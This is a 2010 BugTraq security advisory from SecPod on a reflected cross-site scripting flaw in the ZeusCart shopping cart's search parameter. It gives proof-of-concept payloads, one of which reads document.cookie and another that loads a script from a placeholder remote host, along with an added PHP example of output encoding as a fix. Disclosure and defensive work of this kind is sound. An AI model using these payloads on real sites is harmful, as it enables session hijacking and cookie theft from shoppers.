BugTraq
ZeusCart Ecommerce Shopping Cart Software Cross-Site Scripting Vulnerability
Aug 05 2010 12:13PM
SecPod Research (research secpod com)
Hi,

SecPod Research Team has found a new vulnerability in ZeusCart Ecommerce
Shopping Cart Software.

Advisory details have been attached to this mail.

Regards,
SecPod Research Team
http://www.secpod.com/

#######################################################################
ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability

SecPod Technologies (www.secpod.com)
Author Sooraj K.S
#######################################################################

SecPod ID: 1003

07/28/2010 Issue Discovered
07/30/2010 Vendor Notified
No Response from Vendor

Class: Cross-Site Scripting
Severity: Medium

Overview:
---------
ZeusCart Ecommerce Shopping Cart Software is prone to a cross-site scripting
vulnerability.

Technical Description:
----------------------
ZeusCart Ecommerce Shopping Cart Software is prone to a cross-site scripting
vulnerability because it fails to properly sanitize user-supplied input.

Input passed via the 'search' parameter in a 'search' action in index.php is
not properly verified before it is returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site. This may allow the attacker to steal cookie-based
authentication credentials and to launch other attacks.

The vulnerability has been tested in ZeusCart 3.0 and 2.3. Other versions may
also be affected.

Impact:
--------
Successful exploitation allows an attacker to execute arbitrary HTML and script
code in a user's browser session in the context of a vulnerable site.

Affected Software:
------------------
ZeusCart 3.0
ZeusCart 2.3

Tested on:
ZeusCart 3.0 and 2.3 (tested using Microsoft Internet Explorer browser)

Reference:
---------
http://www.zeuscart.com/
http://secpod.org/blog/?p=109
http://secpod.org/advisories/SECPOD_ZeusCart_XSS.txt

Proof of Concept:
-----------------
1) Input this code in the search box and click search:
'"%22%20style=x:expression(alert(document.cookie))><"
This script executed only in the Microsoft Internet Explorer browser when
tested on ZeusCart 3.0 and 2.3.

2) This example worked on ZeusCart version 2.3:
http://www.example.com/?do=search&search='"><SCRIPT SRC=//REMOTE_SITE_SCRIPT>

Solution:
----------
Fix not available

Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = NONE
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Credits:
--------
Sooraj K.S of SecPod Technologies has been credited with the discovery of this
vulnerability.
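
With no vendor fix available, the reflection described under Technical Description can be closed where the value is written back into the page. The PHP below is an added example, not ZeusCart source code and not part of the SecPod advisory; the function names, the input markup, the 100-byte length limit and the Content-Security-Policy value are assumptions. It contrasts an unescaped reflection with context-aware output encoding, using the two proof-of-concept strings quoted above as input.

```php
<?php
// Added illustration: hypothetical handlers, not ZeusCart source code.

// Vulnerable pattern: the raw 'search' value is written into an HTML attribute,
// so a quote character closes the attribute and the rest is parsed as markup.
function render_search_box_vulnerable(array $query): string
{
    $term = $query['search'] ?? '';
    return '<input type="text" name="search" value="' . $term . '">';
}

// Hardened pattern: constrain the input, then encode for the HTML context on output.
function render_search_box_hardened(array $query): string
{
    $term = $query['search'] ?? '';
    if (!is_string($term)) {          // ?search[]=x arrives as an array
        $term = '';
    }
    $term = substr($term, 0, 100);    // assumed limit; a split multibyte
                                      // character is handled by ENT_SUBSTITUTE
    // ENT_QUOTES encodes both " and ', so the value cannot leave the attribute.
    $safe = htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="search" value="' . $safe . '">';
}

// Defence in depth for the cookie theft the advisory mentions (assumed policy).
function send_defensive_settings(): void
{
    ini_set('session.cookie_httponly', '1');   // must run before session_start()
    header("Content-Security-Policy: default-src 'self'");
}

if (PHP_SAPI !== 'cli') {
    send_defensive_settings();
}

// The two proof-of-concept strings from the advisory, as the server receives them.
$samples = [
    '\'"%22%20style=x:expression(alert(document.cookie))><"',
    '\'"><SCRIPT SRC=//REMOTE_SITE_SCRIPT>',
];

foreach ($samples as $sample) {
    $query = ['search' => $sample];
    echo 'vulnerable: ', render_search_box_vulnerable($query), "\n";
    echo 'hardened:   ', render_search_box_hardened($query), "\n\n";
}
```

In the hardened output every quote and angle bracket appears as an entity (&#039;, &quot;, &lt;, &gt;), so the browser treats the whole string as the attribute's value.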
